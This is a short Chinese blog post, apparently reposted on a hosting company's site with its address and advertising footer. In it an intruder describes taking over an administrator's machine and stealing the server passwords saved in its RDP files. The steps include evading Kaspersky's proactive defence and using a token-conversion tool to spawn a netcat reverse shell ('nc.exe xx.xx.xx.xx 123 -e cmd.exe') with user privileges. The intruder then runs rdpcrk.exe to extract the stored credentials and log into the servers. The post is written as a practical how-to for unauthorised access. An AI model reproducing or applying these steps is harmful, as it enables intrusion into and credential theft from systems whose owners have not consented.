将系统权限转换为用户权限

几天前费了不少力气拿到一管理员机器，主站我盘旋了很久，没有突破口，开了80，还有一个高端端口，当然就是3389了，一阵欣喜，管理员一定会登这个服务器的3389的。
     现在机器是拿到了，翻了翻管理员机器里的东西，本来想装键盘记录的，发现有很多以ip命名的rdp文件，下了一个下回来打开看了一下，真幸运，保存了密码在rdp文件里的（这种情况只有读rdp的密码了，键盘记录记不到）。主站和各分站的3389都是以保存密码登录的，上传一个读取rdp密码的东西就可以读到密码了，但这时遇到一个很头痛的问题，我的马是系统权限的马，读取rdp文件的密码必须要在用户权限下。想装一个用户权限的马上去，可手里没好马，管理员机器上装了个卡巴斯基，还开了主动防御。试着折腾了一下，装其它的马，都被主动防御拦截，管理员还似乎有点发觉，开始检查机器，幸好这个马还稳当，先断开连接。
     接下来仔细想了一下，到底咋搞呢，必须要得到一个用户权限的shell，再上传马上去执行就不敢了，搞不好把现在的这个权限都弄掉。
     最后想起一个令牌转换的东西，试了一下直接用令牌转换工具运行rdpcrk.exe 加参数重定向到文本，结果没读取成功。于是就想到用nc通过令牌转换弹一个用户权限的shell回来。
在马里面执行cmd：change.exe  c:\windows\nc.exe xx.xx.xx.xx 123 -e cmd.exe
在本地临听123端口，接到shell后，传个东西上去，whoami,呵呵，终于得到一个用户权限的shell。
然后rdpcrk.exe  xx.xx.xx.xx.rdp
成功得到密码，直登服务器，搞定。

亿恩科技地址(ADD)：郑州市黄河路129号天一大厦608室 邮编(ZIP)：450008 传真(FAX)：0371-60123888
   联系：亿恩小凡
   QQ：89317007
   电话:0371-63322206

服务器租用/服务器托管中国五强！虚拟主机域名注册顶级提供商！15年品质保障！--亿恩科技[ENKJ.COM]